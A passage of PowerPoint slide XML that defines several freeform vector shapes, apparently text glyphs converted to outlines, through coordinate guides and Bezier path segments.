                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="31"/>
                    <a:pt x="115" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="31"/>
                    <a:pt x="145" y="31"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="110" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="223"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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1" name="Freeform 842">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BA944DA-C33C-4EC2-AC37-E5535C949C1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1449388" y="1930401"/>
              <a:ext cx="87313" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 199 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 184 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 184 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 20 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 15 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 30 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 30 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 136 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 249"/>
                <a:gd name="T31" fmla="*/ 20 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 15 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 30 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 30 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="249" y="215"/>
                    <a:pt x="249" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="184"/>
                    <a:pt x="236" y="184"/>
                    <a:pt x="229" y="184"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="5"/>
                    <a:pt x="204" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="0"/>
                    <a:pt x="130" y="0"/>
                    <a:pt x="130" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="30"/>
                    <a:pt x="143" y="30"/>
                    <a:pt x="150" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="181"/>
                    <a:pt x="132" y="187"/>
                    <a:pt x="116" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="187"/>
                    <a:pt x="77" y="171"/>
                    <a:pt x="77" y="155"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="5"/>
                    <a:pt x="74" y="0"/>
                    <a:pt x="57" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="206"/>
                    <a:pt x="77" y="218"/>
                    <a:pt x="113" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="218"/>
                    <a:pt x="154" y="213"/>
                    <a:pt x="172" y="19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2" name="Freeform 843">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{389BC9EA-02F3-49AE-873F-25AFAA82CF1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1543051" y="1930401"/>
              <a:ext cx="79375" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 30 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 52 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 202 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 187 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="78"/>
                    <a:pt x="125" y="30"/>
                    <a:pt x="185" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="42"/>
                    <a:pt x="194" y="52"/>
                    <a:pt x="206" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="52"/>
                    <a:pt x="227" y="44"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="123" y="9"/>
                    <a:pt x="95" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="23"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="187"/>
                    <a:pt x="158" y="187"/>
                    <a:pt x="150" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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3" name="Freeform 844">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5FE72D-7CFF-4C73-B499-50CC08B4E3D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1641476" y="1898651"/>
              <a:ext cx="65088" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 306"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 91 h 306"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 306"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 306"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 306"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 306"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 306"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 306"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 306"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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6">
                  <a:moveTo>
                    <a:pt x="115" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="96"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="306"/>
                    <a:pt x="13" y="306"/>
                    <a:pt x="20" y="306"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="306"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="306"/>
                    <a:pt x="188" y="306"/>
                    <a:pt x="188" y="291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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4" name="Freeform 845">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46703A6D-5092-4FB9-AED2-53C0D0713859}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1722438" y="1909763"/>
              <a:ext cx="73025" cy="98425"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 280"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 280"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 280"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 62 h 280"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 62 h 280"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 21 h 280"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 280"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 214 h 280"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 280 h 280"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 214 h 280"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 280"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 280"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 280"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 211 h 280"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>
                <a:gd name="T41" fmla="*/ 9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 h="280">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="12" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="262"/>
                    <a:pt x="98" y="280"/>
                    <a:pt x="134" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="280"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="205"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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5" name="Freeform 846">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5050F6C2-4174-472A-9A60-05B7E1A23678}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1812926" y="1930401"/>
              <a:ext cx="82550" cy="115888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 236"/>
                <a:gd name="T1" fmla="*/ 30 h 328"/>
                <a:gd name="T2" fmla="*/ 216 w 236"/>
                <a:gd name="T3" fmla="*/ 30 h 328"/>
                <a:gd name="T4" fmla="*/ 236 w 236"/>
                <a:gd name="T5" fmla="*/ 15 h 328"/>
                <a:gd name="T6" fmla="*/ 216 w 236"/>
                <a:gd name="T7" fmla="*/ 0 h 328"/>
                <a:gd name="T8" fmla="*/ 158 w 236"/>
                <a:gd name="T9" fmla="*/ 0 h 328"/>
                <a:gd name="T10" fmla="*/ 138 w 236"/>
                <a:gd name="T11" fmla="*/ 15 h 328"/>
                <a:gd name="T12" fmla="*/ 158 w 236"/>
                <a:gd name="T13" fmla="*/ 30 h 328"/>
                <a:gd name="T14" fmla="*/ 172 w 236"/>
                <a:gd name="T15" fmla="*/ 30 h 328"/>
                <a:gd name="T16" fmla="*/ 136 w 236"/>
                <a:gd name="T17" fmla="*/ 136 h 328"/>
                <a:gd name="T18" fmla="*/ 123 w 236"/>
                <a:gd name="T19" fmla="*/ 179 h 328"/>
                <a:gd name="T20" fmla="*/ 123 w 236"/>
                <a:gd name="T21" fmla="*/ 179 h 328"/>
                <a:gd name="T22" fmla="*/ 112 w 236"/>
                <a:gd name="T23" fmla="*/ 150 h 328"/>
                <a:gd name="T24" fmla="*/ 66 w 236"/>
                <a:gd name="T25" fmla="*/ 30 h 328"/>
                <a:gd name="T26" fmla="*/ 78 w 236"/>
                <a:gd name="T27" fmla="*/ 30 h 328"/>
                <a:gd name="T28" fmla="*/ 98 w 236"/>
                <a:gd name="T29" fmla="*/ 15 h 328"/>
                <a:gd name="T30" fmla="*/ 78 w 236"/>
                <a:gd name="T31" fmla="*/ 0 h 328"/>
                <a:gd name="T32" fmla="*/ 20 w 236"/>
                <a:gd name="T33" fmla="*/ 0 h 328"/>
                <a:gd name="T34" fmla="*/ 0 w 236"/>
                <a:gd name="T35" fmla="*/ 15 h 328"/>
                <a:gd name="T36" fmla="*/ 20 w 236"/>
                <a:gd name="T37" fmla="*/ 30 h 328"/>
                <a:gd name="T38" fmla="*/ 35 w 236"/>
                <a:gd name="T39" fmla="*/ 30 h 328"/>
                <a:gd name="T40" fmla="*/ 106 w 236"/>
                <a:gd name="T41" fmla="*/ 208 h 328"/>
                <a:gd name="T42" fmla="*/ 108 w 236"/>
                <a:gd name="T43" fmla="*/ 215 h 328"/>
                <a:gd name="T44" fmla="*/ 89 w 236"/>
                <a:gd name="T45" fmla="*/ 269 h 328"/>
                <a:gd name="T46" fmla="*/ 49 w 236"/>
                <a:gd name="T47" fmla="*/ 298 h 328"/>
                <a:gd name="T48" fmla="*/ 52 w 236"/>
                <a:gd name="T49" fmla="*/ 287 h 328"/>
                <a:gd name="T50" fmla="*/ 30 w 236"/>
                <a:gd name="T51" fmla="*/ 265 h 328"/>
                <a:gd name="T52" fmla="*/ 8 w 236"/>
                <a:gd name="T53" fmla="*/ 287 h 328"/>
                <a:gd name="T54" fmla="*/ 50 w 236"/>
                <a:gd name="T55" fmla="*/ 328 h 328"/>
                <a:gd name="T56" fmla="*/ 124 w 236"/>
                <a:gd name="T57" fmla="*/ 257 h 328"/>
                <a:gd name="T58" fmla="*/ 201 w 236"/>
                <a:gd name="T59" fmla="*/ 3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6" h="328">
                  <a:moveTo>
                    <a:pt x="201" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="30"/>
                    <a:pt x="236" y="30"/>
                    <a:pt x="236" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="0"/>
                    <a:pt x="224" y="0"/>
                    <a:pt x="216" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="138" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="150" y="30"/>
                    <a:pt x="158" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
